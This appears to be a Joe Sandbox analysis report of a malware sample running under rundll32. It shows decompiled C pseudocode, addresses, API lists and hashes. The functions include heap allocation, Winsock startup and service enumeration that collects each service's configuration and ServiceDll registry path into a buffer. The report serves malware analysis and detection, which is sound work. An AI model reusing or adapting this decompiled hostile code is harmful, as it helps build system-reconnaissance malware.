                                                            					return E04655AFE(_v8 ^ _t44);
                                                            				} else {
                                                            					__imp__GetModuleFileNameExW(_t17, 0,  &_v528, 0x104); // executed
                                                            					if(_t17 == 0) {
                                                            						goto L9;
                                                            					} else {
                                                            						_t21 = E0465D9BE( &_v528, 0x5c);
                                                            						if(_t21 == 0) {
                                                            							_t33 =  &_v528;
                                                            							_t42 = _t41 - _t33;
                                                            							do {
                                                            								_t23 =  *_t33 & 0x0000ffff;
                                                            								_t33 =  &(_t33[1]);
                                                            								 *(_t42 + _t33 - 2) = _t23;
                                                            							} while (_t23 != 0);
                                                            							return E04655AFE(_v8 ^ _t44);
                                                            						} else {
                                                            							_t26 = _t21 + 2;
                                                            							_t43 = _t41 - _t26;
                                                            							do {
                                                            								_t36 =  *_t26 & 0x0000ffff;
                                                            								_t26 =  &(_t26[1]);
                                                            								 *(_t43 + _t26 - 2) = _t36;
                                                            							} while (_t36 != 0);
                                                            							return E04655AFE(_v8 ^ _t44);
                                                            						}
                                                            					}
                                                            				}
                                                            			}
















                                                            0x04646ef9
                                                            0x04646f00
                                                            0x04646f06
                                                            0x04646f0f
                                                            0x04646f12
                                                            0x04646f1a
                                                            0x04646fa5
                                                            0x04646fb5
                                                            0x04646f20
                                                            0x04646f2f
                                                            0x04646f37
                                                            0x00000000
                                                            0x04646f39
                                                            0x04646f42
                                                            0x04646f4c
                                                            0x04646f77
                                                            0x04646f7f
                                                            0x04646f81
                                                            0x04646f81
                                                            0x04646f84
                                                            0x04646f87
                                                            0x04646f8c
                                                            0x04646fa4
                                                            0x04646f4e
                                                            0x04646f4e
                                                            0x04646f51
                                                            0x04646f53
                                                            0x04646f53
                                                            0x04646f56
                                                            0x04646f59
                                                            0x04646f5e
                                                            0x04646f76
                                                            0x04646f76
                                                            0x04646f4c
                                                            0x04646f37

                                                            APIs
                                                            • OpenProcess.KERNEL32(00000400,00000000,00000000,00000000), ref: 04646F12
                                                            • K32GetModuleFileNameExW.KERNEL32(00000000,00000000,?,00000104), ref: 04646F2F
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileModuleNameOpenProcess
                                                            • String ID:
                                                            • API String ID: 3261405110-0
                                                            • Opcode ID: 53a46fc19bfb535e3538728ec108d1c9e1c6baa2c31b955e6493ab084489f41f
                                                            • Instruction ID: 1faf71b7074f15e6fd3030ba39c242c02b3cbe19606de2a5aa7562e153256c8d
                                                            • Opcode Fuzzy Hash: 53a46fc19bfb535e3538728ec108d1c9e1c6baa2c31b955e6493ab084489f41f
                                                            • Instruction Fuzzy Hash: 5111D675A102085AEF24DF78C84ABBAB3F8DF44300F01419DEC4AD7295FA75AE048754
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 345 466cd53-466cd60 call 4668535 347 466cd65-466cd70 345->347 348 466cd76-466cd7e 347->348 349 466cd72-466cd74 347->349 350 466cdbe-466cdcc call 46684ad 348->350 351 466cd80-466cd84 348->351 349->350 352 466cd86-466cdb8 call 4669220 351->352 357 466cdba-466cdbd 352->357 357->350
                                                            C-Code - Quality: 91%
                                                            			E0466CD53(void* __esi, void* __eflags) {
                                                            				intOrPtr _v12;
                                                            				void* __ecx;
                                                            				char _t16;
                                                            				void* _t17;
                                                            				void* _t26;
                                                            				void* _t28;
                                                            				void* _t30;
                                                            				char _t31;
                                                            				void* _t33;
                                                            				intOrPtr* _t35;
                                                            
                                                            				_push(_t26);
                                                            				_push(_t26);
                                                            				_t16 = E04668535(_t26, 0x40, 0x30); // executed
                                                            				_t31 = _t16;
                                                            				_v12 = _t31;
                                                            				_t28 = _t30;
                                                            				if(_t31 != 0) {
                                                            					_t2 = _t31 + 0xc00; // 0xc00
                                                            					_t17 = _t2;
                                                            					__eflags = _t31 - _t17;
                                                            					if(__eflags != 0) {
                                                            						_t3 = _t31 + 0x20; // 0x20
                                                            						_t35 = _t3;
                                                            						_t33 = _t17;
                                                            						do {
                                                            							_t4 = _t35 - 0x20; // 0x0
                                                            							E04669220(_t28, _t35, __eflags, _t4, 0xfa0, 0);
                                                            							 *(_t35 - 8) =  *(_t35 - 8) | 0xffffffff;
                                                            							 *_t35 = 0;
                                                            							_t35 = _t35 + 0x30;
                                                            							 *((intOrPtr*)(_t35 - 0x2c)) = 0;
                                                            							 *((intOrPtr*)(_t35 - 0x28)) = 0xa0a0000;
                                                            							 *((char*)(_t35 - 0x24)) = 0xa;
                                                            							 *(_t35 - 0x23) =  *(_t35 - 0x23) & 0x000000f8;
                                                            							 *((char*)(_t35 - 0x22)) = 0;
                                                            							__eflags = _t35 - 0x20 - _t33;
                                                            						} while (__eflags != 0);
                                                            						_t31 = _v12;
                                                            					}
                                                            				} else {
                                                            					_t31 = 0;
                                                            				}
                                                            				E046684AD(0);
                                                            				return _t31;
                                                            			}













                                                            0x0466cd58
                                                            0x0466cd59
                                                            0x0466cd60
                                                            0x0466cd65
                                                            0x0466cd69
                                                            0x0466cd6d
                                                            0x0466cd70
                                                            0x0466cd76
                                                            0x0466cd76
                                                            0x0466cd7c
                                                            0x0466cd7e
                                                            0x0466cd81
                                                            0x0466cd81
                                                            0x0466cd84
                                                            0x0466cd86
                                                            0x0466cd8c
                                                            0x0466cd90
                                                            0x0466cd95
                                                            0x0466cd99
                                                            0x0466cd9b
                                                            0x0466cd9e
                                                            0x0466cda4
                                                            0x0466cdab
                                                            0x0466cdaf
                                                            0x0466cdb3
                                                            0x0466cdb6
                                                            0x0466cdb6
                                                            0x0466cdba
                                                            0x0466cdbd
                                                            0x0466cd72
                                                            0x0466cd72
                                                            0x0466cd72
                                                            0x0466cdbf
                                                            0x0466cdcc

                                                            APIs
                                                              • Part of subcall function 04668535: RtlAllocateHeap.NTDLL(00000008,00000001,00000000), ref: 04668576
                                                            • _free.LIBCMT ref: 0466CDBF
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap_free
                                                            • String ID:
                                                            • API String ID: 614378929-0
                                                            • Opcode ID: 389323fce349f954e8f7e3adb0ceee89fe9bd0c8d1abebbdd79f88e03ef245ec
                                                            • Instruction ID: 7c42fbbc75485794c903e86c5141ea0cf3a95ee0866132888bb682598bd366fc
                                                            • Opcode Fuzzy Hash: 389323fce349f954e8f7e3adb0ceee89fe9bd0c8d1abebbdd79f88e03ef245ec
                                                            • Instruction Fuzzy Hash: 8201F9722007056BE321DF65D841D9AFBEDEB85370F25052EE5D583280FA30B806C778
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 358 4668535-4668540 359 4668542-466854c 358->359 360 466854e-4668554 358->360 359->360 361 4668582-466858d call 4661772 359->361 362 4668556-4668557 360->362 363 466856d-466857e RtlAllocateHeap 360->363 367 466858f-4668591 361->367 362->363 364 4668580 363->364 365 4668559-4668560 call 466bc5c 363->365 364->367 365->361 371 4668562-466856b call 46609ac 365->371 371->361 371->363
                                                            C-Code - Quality: 95%
                                                            			E04668535(void* __ecx, signed int _a4, signed int _a8) {
                                                            				void* __esi;
                                                            				void* _t8;
                                                            				void* _t12;
                                                            				signed int _t13;
                                                            				void* _t15;
                                                            				signed int _t18;
                                                            				long _t19;
                                                            
                                                            				_t15 = __ecx;
                                                            				_t18 = _a4;
                                                            				if(_t18 == 0) {
                                                            					L2:
                                                            					_t19 = _t18 * _a8;
                                                            					if(_t19 == 0) {
                                                            						_t19 = _t19 + 1;
                                                            					}
                                                            					while(1) {
                                                            						_t8 = RtlAllocateHeap( *0x468767c, 8, _t19); // executed
                                                            						if(_t8 != 0) {
                                                            							break;
                                                            						}
                                                            						__eflags = E0466BC5C();
                                                            						if(__eflags == 0) {
                                                            							L8:
                                                            							 *((intOrPtr*)(E04661772())) = 0xc;
                                                            							__eflags = 0;
                                                            							return 0;
                                                            						}
                                                            						_t12 = E046609AC(_t15, _t19, __eflags, _t19);
                                                            						_pop(_t15);
                                                            						__eflags = _t12;
                                                            						if(_t12 == 0) {
                                                            							goto L8;
                                                            						}
                                                            					}
                                                            					return _t8;
                                                            				}
                                                            				_t13 = 0xffffffe0;
                                                            				if(_t13 / _t18 < _a8) {
                                                            					goto L8;
                                                            				}
                                                            				goto L2;
                                                            			}










                                                            0x04668535
                                                            0x0466853b
                                                            0x04668540
                                                            0x0466854e
                                                            0x0466854e
                                                            0x04668554
                                                            0x04668556
                                                            0x04668556
                                                            0x0466856d
                                                            0x04668576
                                                            0x0466857e
                                                            0x00000000
                                                            0x00000000
                                                            0x0466855e
                                                            0x04668560
                                                            0x04668582
                                                            0x04668587
                                                            0x0466858d
                                                            0x00000000
                                                            0x0466858d
                                                            0x04668563
                                                            0x04668568
                                                            0x04668569
                                                            0x0466856b
                                                            0x00000000
                                                            0x00000000
                                                            0x0466856b
                                                            0x00000000
                                                            0x0466856d
                                                            0x04668546
                                                            0x0466854c
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000008,00000001,00000000), ref: 04668576
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: b6ea7f5692adf36847857172ccd33c5d1676cf4f1746854953adc792254a53cd
                                                            • Instruction ID: 2b83654af2a127131119faf4e36ca3b6263e4302a24f075b54c93c223039f492
                                                            • Opcode Fuzzy Hash: b6ea7f5692adf36847857172ccd33c5d1676cf4f1746854953adc792254a53cd
                                                            • Instruction Fuzzy Hash: AFF0E07161213477A7517E365C04B673B4AEF557B0F188616A817D7150FA30FD004594
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            C-Code - Quality: 68%
                                                            			E04631050(void* __ecx, void* __eflags) {
                                                            				signed int _v8;
                                                            				signed int _t4;
                                                            				signed int _t12;
                                                            				void* _t13;
                                                            
                                                            				_t4 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t4 ^ _t12;
                                                            				E04671860(__ecx);
                                                            				__imp__#115(_t13); // executed
                                                            				 *0x4687b0c = 0x190;
                                                            				E04655EA1(__eflags, 0x4672fe0);
                                                            				return E04655AFE(_v8 ^ _t12, 0x202);
                                                            			}







                                                            0x04631054
                                                            0x0463105b
                                                            0x04631063
                                                            0x0463106e
                                                            0x04631079
                                                            0x0463107e
                                                            0x04631096

                                                            APIs
                                                            • WSAStartup.WS2_32(00000202), ref: 0463106E
                                                              • Part of subcall function 04655EA1: __onexit.LIBCMT ref: 04655EA7
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Startup__onexit
                                                            • String ID:
                                                            • API String ID: 1034835647-0
                                                            • Opcode ID: ae48e87eb50ff83a06499085d6537dd2973828c8d9ab14928e393fa72d793898
                                                            • Instruction ID: 4ac6a37d85750467349525777a8d7c77c2328d6fa55d709416e4afd423f1a740
                                                            • Opcode Fuzzy Hash: ae48e87eb50ff83a06499085d6537dd2973828c8d9ab14928e393fa72d793898
                                                            • Instruction Fuzzy Hash: C7E04870A00208FBD704EFA5DC0A95D77E4DB09614F40016DA805D7255FA397D14CB95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 88%
                                                            			E04642FB0(void* __ebx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				short _v528;
                                                            				short _v1048;
                                                            				short _v1568;
                                                            				short _v2088;
                                                            				short _v2608;
                                                            				short _v3128;
                                                            				void* _v3132;
                                                            				int* _v3136;
                                                            				int _v3140;
                                                            				WCHAR** _v3144;
                                                            				long _v3148;
                                                            				int* _v3152;
                                                            				long _v3156;
                                                            				void* _v3160;
                                                            				int* _v3164;
                                                            				int* _v3168;
                                                            				void* _v3172;
                                                            				WCHAR* _v3176;
                                                            				WCHAR* _v3180;
                                                            				WCHAR* _v3184;
                                                            				int* _v3188;
                                                            				int _v3192;
                                                            				intOrPtr _v3196;
                                                            				int* _v3200;
                                                            				void* _v3204;
                                                            				void* _v3208;
                                                            				int _v3212;
                                                            				signed int _t206;
                                                            				int* _t214;
                                                            				long _t215;
                                                            				int** _t219;
                                                            				void* _t220;
                                                            				long _t225;
                                                            				void* _t234;
                                                            				WCHAR** _t252;
                                                            				int _t254;
                                                            				int _t255;
                                                            				int _t256;
                                                            				int _t257;
                                                            				int _t258;
                                                            				int _t259;
                                                            				int _t261;
                                                            				int _t263;
                                                            				int _t265;
                                                            				int _t267;
                                                            				int _t271;
                                                            				signed int _t295;
                                                            				signed int _t313;
                                                            				signed int _t319;
                                                            				signed int _t325;
                                                            				signed int _t333;
                                                            				int _t355;
                                                            				intOrPtr _t377;
                                                            				intOrPtr _t378;
                                                            				void* _t389;
                                                            				void* _t390;
                                                            				WCHAR** _t391;
                                                            				WCHAR* _t393;
                                                            				WCHAR* _t394;
                                                            				WCHAR* _t395;
                                                            				WCHAR* _t396;
                                                            				int* _t402;
                                                            				long _t405;
                                                            				void* _t408;
                                                            				int* _t423;
                                                            				void* _t426;
                                                            				void* _t443;
                                                            				WCHAR** _t444;
                                                            				void* _t445;
                                                            				void* _t447;
                                                            				void* _t448;
                                                            				void* _t449;
                                                            				void* _t451;
                                                            				void* _t453;
                                                            				void* _t455;
                                                            				void* _t457;
                                                            				void* _t459;
                                                            				void* _t461;
                                                            				void* _t463;
                                                            				void* _t470;
                                                            				signed int _t473;
                                                            				void* _t474;
                                                            				void* _t475;
                                                            				void* _t476;
                                                            				void* _t477;
                                                            
                                                            				_t206 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t206 ^ _t473;
                                                            				_v3168 = 0;
                                                            				_v3152 = 0;
                                                            				_v3164 = 0;
                                                            				_t389 = OpenSCManagerW(0, 0, 0xf003f);
                                                            				_v3204 = _t389;
                                                            				if(_t389 == 0) {
                                                            					L3:
                                                            					return E04655AFE(_v8 ^ _t473);
                                                            				} else {
                                                            					__imp__EnumServicesStatusExW(_t389, 0, 0x30, 3, 0, 0,  &_v3168,  &_v3152,  &_v3164, 0);
                                                            					_t214 = _v3168;
                                                            					if(_t214 != 0) {
                                                            						_t215 =  &(_t214[0xb]);
                                                            						_v3160 = _t215;
                                                            						_t426 = LocalAlloc(0x40, _t215);
                                                            						_v3208 = _t426;
                                                            						if(_t426 != 0) {
                                                            							_v3164 = 0;
                                                            							_t219 =  &_v3168;
                                                            							__imp__EnumServicesStatusExW(_t389, 0, 0x30, 3, _t426, _v3160, _t219,  &_v3152,  &_v3164, 0);
                                                            							if(_t219 != 0) {
                                                            								_t220 = LocalAlloc(0x40, 0x19000);
                                                            								_v3132 = _t220;
                                                            								 *_t220 = 0x87;
                                                            								_v3148 = 1;
                                                            								_t390 = LocalAlloc(0x40, 0x2000);
                                                            								_v3188 = 0;
                                                            								_v3160 = _t390;
                                                            								_v3144 = LocalAlloc(0x40, 0x2000);
                                                            								E0465DEA0(_t426,  &_v528, 0, 0x208);
                                                            								_t475 = _t474 + 0xc;
                                                            								_v3200 = 0;
                                                            								if(_v3152 <= 0) {
                                                            									_t225 = 1;
                                                            								} else {
                                                            									_t470 = lstrlenW;
                                                            									_t402 = _t426;
                                                            									_v3136 = _t402;
                                                            									do {
                                                            										_t429 = 0x467c5d0;
                                                            										_v3196 = 0xffffffff;
                                                            										_v3156 = 0x467c5d0;
                                                            										 *_v3144 = 0x467c5d0;
                                                            										_v3176 = 0x467c5d0;
                                                            										_v3180 = 0x467c5d0;
                                                            										_v3184 = 0x467c5d0;
                                                            										_t234 = OpenServiceW(_v3204,  *_t402, 1);
                                                            										_v3140 = _t234;
                                                            										if(_t234 == 0) {
                                                            											_t391 = _v3144;
                                                            										} else {
                                                            											_t402 =  &_v3188;
                                                            											if(QueryServiceConfigW(_t234, _t390, 0x2000, _t402) != 0) {
                                                            												_v3196 =  *((intOrPtr*)(_t390 + 4));
                                                            												_t429 =  !=  ?  *((intOrPtr*)(_t390 + 0xc)) : 0x467c5d0;
                                                            												_t377 =  *((intOrPtr*)(_t390 + 0x10));
                                                            												_v3156 = 0x467c5d0;
                                                            												_t412 =  !=  ? _t377 : 0x467c5d0;
                                                            												_t378 =  *((intOrPtr*)(_t390 + 0x18));
                                                            												_v3176 =  !=  ? _t377 : 0x467c5d0;
                                                            												_t414 =  !=  ? _t378 : 0x467c5d0;
                                                            												_v3180 =  !=  ? _t378 : 0x467c5d0;
                                                            												_t402 =  !=  ?  *((intOrPtr*)(_t390 + 0x1c)) : 0x467c5d0;
                                                            												_v3184 = _t402;
                                                            											}
                                                            											_t391 = _v3144;
                                                            											__imp__QueryServiceConfig2W(_v3140, 1, _t391, 0x2000,  &_v3188);
                                                            											if( *_t391 == 0) {
                                                            												 *_t391 = 0x467c5d0;
                                                            											}
                                                            											CloseServiceHandle(_v3140);
                                                            										}
                                                            										E0465DEA0(_t429,  &_v528, 0, 0x208);
                                                            										E0465DEA0(_t429,  &_v1048, 0, 0x208);
                                                            										wsprintfW( &_v3128, L"SYSTEM\\CurrentControlSet\\Services\\%s\\Parameters",  *_v3136);
                                                            										_v3192 = 0x104;
                                                            										_v3140 = 0;
                                                            										E0465DEA0(_t429,  &_v1048, 0, 0x104);
                                                            										_t476 = _t475 + 0x30;
                                                            										_v3172 = 0;
                                                            										if(RegOpenKeyExW(0x80000002,  &_v3128, 0, 0x20119,  &_v3172) != 0) {
                                                            											L21:
                                                            											_push(_t402);
                                                            											E04645FE0(_t429,  &_v1048);
                                                            											E04645DD0(_t391,  &_v1048,  &_v1568, _t429, _t470,  &_v2088,  &_v2608);
                                                            											_t477 = _t476 + 0xc;
                                                            										} else {
                                                            											RegQueryValueExW(_v3172, L"ServiceDll", 0,  &_v3212,  &_v1048,  &_v3192);
                                                            											_t402 = 1;
                                                            											_t363 =  ==  ? 1 : _v3140;
                                                            											_v3140 =  ==  ? 1 : _v3140;
                                                            											RegCloseKey(_v3172);
                                                            											if(_v3140 == 0 || _v3192 <= 0) {
                                                            												goto L21;
                                                            											} else {
                                                            												ExpandEnvironmentStringsW( &_v1048,  &_v528, 0x104);
                                                            												E04645DD0(_t391,  &_v528,  &_v1568, _t429, _t470,  &_v2088,  &_v2608);
                                                            												_t477 = _t476 + 8;
                                                            											}
                                                            										}
                                                            										_t252 = _v3136;
                                                            										_v3140 = lstrlenW(_t252[1]);
                                                            										_t254 = lstrlenW( *_t391);
                                                            										_t255 = lstrlenW( *_t252);
                                                            										_t256 = lstrlenW(_v3184);
                                                            										_t257 = lstrlenW(_v3180);
                                                            										_t258 = lstrlenW(_v3176);
                                                            										_t393 = _v3156;
                                                            										_t259 = lstrlenW(_t393);
                                                            										_t261 = lstrlenW( &_v1568);
                                                            										_t263 = lstrlenW( &_v2088);
                                                            										_t265 = lstrlenW( &_v2608);
                                                            										_t267 = lstrlenW( &_v528);
                                                            										_t443 = _v3132;
                                                            										_v3156 = _v3148 + 0x3e + _v3140 + _t254 + _t255 + _t256 + _t257 + _t258 + _t259 + _t261 + _t263 + _t265 + _t267 + _v3140 + _t254 + _t255 + _t256 + _t257 + _t258 + _t259 + _t261 + _t263 + _t265 + _t267;
                                                            										_t271 = LocalSize(_t443);
                                                            										_t405 = _v3156;
                                                            										if(_t271 < _t405) {
                                                            											_v3132 = LocalReAlloc(_t443, _t405, 0x42);
                                                            										}
                                                            										_t444 = _v3136;
                                                            										E0465E060(_v3132 + _v3148,  *_t444, 2 + lstrlenW( *_t444) * 2);
                                                            										_t445 = _v3148 + 2 + lstrlenW( *_t444) * 2;
                                                            										E0465E060(_v3132 + _t445, _v3136[1], 2 + lstrlenW(_v3136[1]) * 2);
                                                            										_t447 = _t445 + lstrlenW(_v3136[1]) * 2 + 2;
                                                            										E0465E060(_v3132 + _t447,  *_v3144, 2 + lstrlenW( *_v3144) * 2);
                                                            										_t295 = lstrlenW( *_v3144);
                                                            										_t408 = _v3132;
                                                            										_t448 = _t447 + _t295 * 2;
                                                            										asm("movups xmm0, [eax+0x8]");
                                                            										asm("movups [edi+ecx+0x2], xmm0");
                                                            										asm("movups xmm0, [eax+0x18]");
                                                            										asm("movups [edi+ecx+0x12], xmm0");
                                                            										 *(_t448 + _t408 + 0x22) = _v3136[0xa];
                                                            										 *((intOrPtr*)(_t448 + _t408 + 0x26)) = _v3196;
                                                            										_t449 = _t448 + 0x2a;
                                                            										E0465E060(_v3132 + _t449, _t393, 2 + lstrlenW(_t393) * 2);
                                                            										_t451 = _t449 + lstrlenW(_t393) * 2 + 2;
                                                            										E0465E060(_v3132 + _t451,  &_v528, 2 + lstrlenW( &_v528) * 2);
                                                            										_t313 = lstrlenW( &_v528);
                                                            										_t394 = _v3176;
                                                            										_t453 = _t451 + _t313 * 2 + 2;
                                                            										E0465E060(_v3132 + _t453, _t394, 2 + lstrlenW(_t394) * 2);
                                                            										_t319 = lstrlenW(_t394);
                                                            										_t395 = _v3180;
                                                            										_t455 = _t453 + _t319 * 2 + 2;
                                                            										E0465E060(_v3132 + _t455, _t395, 2 + lstrlenW(_t395) * 2);
                                                            										_t325 = lstrlenW(_t395);
                                                            										_t396 = _v3184;
                                                            										_t457 = _t455 + _t325 * 2 + 2;
                                                            										E0465E060(_v3132 + _t457, _t396, 2 + lstrlenW(_t396) * 2);
                                                            										_t459 = _t457 + lstrlenW(_t396) * 2 + 2;
                                                            										_t333 = lstrlenW( &_v1568);
                                                            										_t397 = _v3132;
                                                            										E0465E060(_t459 + _v3132,  &_v1568, 2 + _t333 * 2);
                                                            										_t461 = _t459 + lstrlenW( &_v1568) * 2 + 2;
                                                            										E0465E060(_t461 + _v3132,  &_v2088, 2 + lstrlenW( &_v2088) * 2);
                                                            										_t463 = _t461 + lstrlenW( &_v2088) * 2 + 2;
                                                            										E0465E060(_t463 + _t397,  &_v2608, 2 + lstrlenW( &_v2608) * 2);
                                                            										_t475 = _t477 + 0x84;
                                                            										_t355 = lstrlenW( &_v2608);
                                                            										_t423 =  &(_v3200[0]);
                                                            										_t390 = _v3160;
                                                            										_t402 =  &(_v3136[0xb]);
                                                            										_v3200 = _t423;
                                                            										_t225 = _t463 + (_t355 + 1) * 2;
                                                            										_v3136 = _t402;
                                                            										_v3148 = _t225;
                                                            									} while (_t423 < _v3152);
                                                            								}
                                                            								LocalReAlloc(_v3132, _t225, 0x42);
                                                            								LocalFree(_v3144);
                                                            								LocalFree(_t390);
                                                            								LocalFree(_v3208);
                                                            								CloseServiceHandle(_v3204);
                                                            								return E04655AFE(_v8 ^ _t473);
                                                            							} else {
                                                            								CloseServiceHandle(_t389);
                                                            								LocalFree(_t426);
                                                            								return E04655AFE(_v8 ^ _t473);
                                                            							}
                                                            						} else {
                                                            							CloseServiceHandle(_t389);
                                                            							return E04655AFE(_v8 ^ _t473);
                                                            						}
                                                            					} else {
                                                            						CloseServiceHandle(_t389);
                                                            						goto L3;
                                                            					}
                                                            				}
                                                            			}

























































































                                                            0x04642fb9
                                                            0x04642fc0
                                                            0x04642fcd
                                                            0x04642fd7
                                                            0x04642fe1
                                                            0x04642ff1
                                                            0x04642ff3
                                                            0x04642ffb
                                                            0x04643036
                                                            0x04643046
                                                            0x04642ffd
                                                            0x0464301f
                                                            0x04643025
                                                            0x0464302d
                                                            0x0464304e
                                                            0x04643055
                                                            0x0464305d
                                                            0x0464305f
                                                            0x04643067
                                                            0x0464308b
                                                            0x0464309d
                                                            0x046430b2
                                                            0x046430ba
                                                            0x046430e4
                                                            0x046430ed
                                                            0x046430f3
                                                            0x046430f6
                                                            0x04643107
                                                            0x04643109
                                                            0x04643115
                                                            0x04643122
                                                            0x04643131
                                                            0x04643136
                                                            0x04643139
                                                            0x0464314a
                                                            0x04643702
                                                            0x04643150
                                                            0x04643150
                                                            0x04643156
                                                            0x04643158
                                                            0x04643160
                                                            0x04643166
                                                            0x0464316d
                                                            0x04643177
                                                            0x0464317d
                                                            0x04643181
                                                            0x0464318d
                                                            0x04643193
                                                            0x04643199
                                                            0x0464319f
                                                            0x046431a7
                                                            0x0464324f
                                                            0x046431ad
                                                            0x046431ad
                                                            0x046431c3
                                                            0x046431cd
                                                            0x046431d8
                                                            0x046431db
                                                            0x046431e0
                                                            0x046431e6
                                                            0x046431e9
                                                            0x046431ec
                                                            0x046431f9
                                                            0x046431ff
                                                            0x0464320c
                                                            0x0464320f
                                                            0x0464320f
                                                            0x04643215
                                                            0x04643230
                                                            0x04643239
                                                            0x0464323b
                                                            0x0464323b
                                                            0x04643247
                                                            0x04643247
                                                            0x04643263
                                                            0x04643276
                                                            0x0464328f
                                                            0x04643297
                                                            0x046432a7
                                                            0x046432b4
                                                            0x046432b9
                                                            0x046432bc
                                                            0x046432e8
                                                            0x04643388
                                                            0x04643388
                                                            0x04643391
                                                            0x046433b0
                                                            0x046433b5
                                                            0x046432ee
                                                            0x04643310
                                                            0x0464331e
                                                            0x04643329
                                                            0x0464332c
                                                            0x04643332
                                                            0x04643340
                                                            0x00000000
                                                            0x0464334b
                                                            0x0464335e
                                                            0x0464337e
                                                            0x04643383
                                                            0x04643383
                                                            0x04643340
                                                            0x046433b8
                                                            0x046433c8
                                                            0x046433ce
                                                            0x046433d9
                                                            0x046433e3
                                                            0x046433ed
                                                            0x046433f7
                                                            0x046433f9
                                                            0x04643402
                                                            0x0464340d
                                                            0x04643418
                                                            0x04643423
                                                            0x0464342e
                                                            0x0464343f
                                                            0x04643446
                                                            0x0464344c
                                                            0x04643452
                                                            0x0464345a
                                                            0x04643466
                                                            0x04643466
                                                            0x0464346c
                                                            0x0464348d
                                                            0x046434a2
                                                            0x046434ca
                                                            0x046434e6
                                                            0x04643506
                                                            0x04643516
                                                            0x04643518
                                                            0x0464351f
                                                            0x04643528
                                                            0x0464352c
                                                            0x04643531
                                                            0x04643535
                                                            0x0464353d
                                                            0x04643547
                                                            0x0464354b
                                                            0x04643562
                                                            0x04643576
                                                            0x04643594
                                                            0x046435a3
                                                            0x046435a5
                                                            0x046435af
                                                            0x046435c6
                                                            0x046435cf
                                                            0x046435d1
                                                            0x046435db
                                                            0x046435f2
                                                            0x046435fb
                                                            0x046435fd
                                                            0x04643607
                                                            0x0464361e
                                                            0x04643633
                                                            0x04643636
                                                            0x04643638
                                                            0x04643651
                                                            0x0464366c
                                                            0x04643684
                                                            0x0464369f
                                                            0x046436b7
                                                            0x046436bc
                                                            0x046436c6
                                                            0x046436d5
                                                            0x046436d6
                                                            0x046436dc
                                                            0x046436df
                                                            0x046436e5
                                                            0x046436e8
                                                            0x046436ee
                                                            0x046436f4
                                                            0x04643700
                                                            0x04643710
                                                            0x04643724
                                                            0x04643727
                                                            0x0464372f
                                                            0x04643737
                                                            0x0464374f
                                                            0x046430bc
                                                            0x046430bd
                                                            0x046430c4
                                                            0x046430dc
                                                            0x046430dc
                                                            0x04643069
                                                            0x0464306a
                                                            0x04643082
                                                            0x04643082
                                                            0x0464302f
                                                            0x04643030
                                                            0x00000000
                                                            0x04643030
                                                            0x0464302d

                                                            APIs
                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 04642FEB
                                                            • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0464301F
                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 04643030
                                                            • LocalAlloc.KERNEL32(00000040,-0000002C), ref: 0464305B
                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 0464306A
                                                            • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,?,00000000,00000000,00000000,00000000), ref: 046430B2
                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 046430BD
                                                            • LocalFree.KERNEL32(00000000), ref: 046430C4
                                                            • LocalAlloc.KERNEL32(00000040,00019000), ref: 046430E4
                                                            • LocalAlloc.KERNEL32(00000040,00002000), ref: 04643100
                                                            • LocalAlloc.KERNEL32(00000040,00002000), ref: 0464311B
                                                            • OpenServiceW.ADVAPI32(?,00000000,00000001), ref: 04643199
                                                            • QueryServiceConfigW.ADVAPI32(00000000,00000000,00002000,00000000), ref: 046431BB
                                                            • QueryServiceConfig2W.ADVAPI32(?,00000001,?,00002000,00000000), ref: 04643230
                                                            • CloseServiceHandle.ADVAPI32(?), ref: 04643247
                                                            Strings
